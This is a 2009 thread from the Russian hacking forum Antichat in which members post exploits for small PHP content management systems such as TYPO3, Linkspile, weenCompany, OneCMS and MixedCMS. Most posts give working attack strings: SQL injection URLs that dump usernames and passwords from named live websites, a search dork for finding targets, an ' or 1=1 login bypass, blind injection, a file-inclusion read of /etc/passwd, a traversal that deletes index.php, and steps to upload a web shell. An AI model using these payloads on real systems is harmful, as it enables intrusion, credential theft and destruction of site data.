Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

25.08.2009, 13:27
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от [underwater]
TYPO3 CMS 4.0
SQL-injection:
Код:
http://www.site.com/index.php?id=[xxx][showUid]=-1+union+select+username,2,password,4,5,6,7+from+be _users--&cHash=[xxx]
Если нету копирайта, значит уязвимость найдена автором сообщения. Хотя это не так.
http://tinyurl.com/mykouz
|
|
|

26.08.2009, 13:52
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
Linkspile
SQL Inj:
Код:
http://www.site.ru/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
POC:
Код:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
|
|
|

27.08.2009, 00:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от [underwater]
Linkspile
SQL Inj:
Код:
http://www.site.ru/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
POC:
Код:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
http://www.linkspile.com/user.link.page.php?siteid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,user(),database(),version()),14,15,16,17,18--&lng=PHP
ЗЫ.как бэ добавлю, но вроде все это постить не сюда бы)))так как сорцов нету на руках)))и код выложить не можем
|
|
|

09.09.2009, 16:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от ElteRUS
SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_
SQL-injection
Уязвимый код:
photo.php
PHP код:
. . .
if (isset($_GET['photo_id'])) {
$photo_id = mysql_real_escape_string($_GET['photo_id']);
$sql = "SELECT * FROM " . $dbprefix . "photos WHERE photo_id=$photo_id";
$result=mysql_query($sql);
. . .
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте
PHP код:
. . .
elseif (isset($_GET['event_id'])) {
$event_id = mysql_real_escape_string($_GET['event_id']);
. . .
$sql = "SELECT * FROM " . $dbprefix . "events WHERE event_id=$event_id";
$result=mysql_query($sql);
. . .
забавный код в файле admin_delete_image.php
PHP код:
/* admin_delete_image.php will delete an image from the server */
Require "passcheck.php";
$image=$_GET["image"];
if (file_exists("../uploads/$image")) {
unlink("../uploads/$image");
}
header("Location: admin_view_images.php");
exit;
?>
имея права админа можно удалить любые файлы!!который имеют соответсвующие права
admin/admin_delete_image.php?image=../index.php%00 и у нас стерается наш index.php
|
|
|

06.10.2009, 22:23
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
weenCompany
китайская цмс
Сайт: http://www.weentech.com/
Дорк: "Created by weenCompany"
SQL-injection
Уязвимый код:
index.php
PHP код:
. . .
if($article = $DB->query_first("SELECT title, metakeywords, metadescription
FROM " . TABLE_PREFIX . $_GET['moduleid']. " WHERE articleid = '" . $_GET['articleid'] . "'"))
. . .
Эксплуатация:
site.com/index.php?moduleid=m2_news[SQL-inj]&articleid=1
Примеры:
http://www.stone-business.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
http://perrint.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
Вывод в тайтле
|
|
|

14.10.2009, 10:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
TGS Content Management
Только нужна рега, а где там регаться я не нашел (
SQL
Файл Message.php
MQ=off
PHP код:
$id = $_GET['id'];
$query = "SELECT * FROM $table_messanger WHERE messanger_id = '".$id."' ";
думаю что во всех версиях, в последней есть она
Файл user.php
PHP код:
$userid = $_GET['id'];
$user_table = $prefix."backend_user";
$usermanager_query = "SELECT * FROM $user_table WHERE user_id = '".$userid."' ";
Файл gallery.php
PHP код:
switch($_GET['option'])
{
case "delete":
if (!isset($_GET['iID']))
{ // delete gallery and all images
$query = "SELECT * FROM `".$table_images."` WHERE `gallery_id` = '".$_GET['gID']."' ";
Последний раз редактировалось HAXTA4OK; 14.10.2009 в 10:28..
|
|
|

14.10.2009, 22:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
OneCMS тока я чет не нашел их(((
вход в админку
PHP код:
if ($_GET['load'] == "login") {
$admin_page = "yes";
if ($_GET['login'] == "yes") {
$usernameb = check(stripcslashes($_POST['username']));
$passwordc = check($_POST['password']);
$passwordb = md5($passwordc);
$sql = mysql_query("SELECT * FROM ".$pre."users WHERE username = '".$usernameb."' AND password = '".$passwordb."' LIMIT 1");
$login_check = mysql_num_rows($sql);
login :' or 1=1/*
pass :любой
|
|
|

15.10.2009, 15:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
MycroCMS
Blind SQL
exploit:
Код:
?cat_id=2'+and+substring(version(),1,1)=5+--+
_http://www.makesense.ch/mycrocms/?cat_id=2'+and+substring(version(),1,1)=5+--+
PS дыру с entry_id залотали
|
|
|

16.10.2009, 16:59
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
MultiEngine CMS 0.9.4
LFI
PoC: http://site.ru/?mod=.../.../.../.../.../.../.../etc/passwd
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

16.10.2009, 19:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
MixedCMS_10
LFI
PHP код:
$mod = $_REQUEST['mod'];
$op = $_REQUEST['op'];
$isadmin = $_REQUEST['isadmin'];
include "../engine/db.config.php";
include "./mod/".$mod."/".$mod."_admin.php";
http://site.com/modules/mod.php?mod='%00
там есть аплоад
Аплодим шелл
Файл download_admin.php
PHP код:
include "./mod/download/download_config.php";
...
<td align=\"center\"><a href=\"mod.php?mod=download&op=add&isadmin=1\"><b>Add Download</b></a></td>
<td align=\"center\"> <!--<a href=\"mod.php?mod=download\"><b>Download Page</b></a>--></td>
...
if (!@copy($url, $gal_path."/".$url))
{
disp_error($url." failed to copy");
}
unlink($url);
...
download_config.php
PHP код:
$gal_path = './mod/download/archieves';
по этому куску кода видно mod.php?mod=download&op=add&isadmin=1\" Add Download
значит надо его грузить
http://site.com/modules/mod.php?mod=download&op=add&isadmin=1
затем загружаем шелл и получаем его по адресу modules/mod/download/archieves/shell.php
PS гуглом и поиском проверил вроде нету такой
Последний раз редактировалось HAXTA4OK; 16.10.2009 в 19:15..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|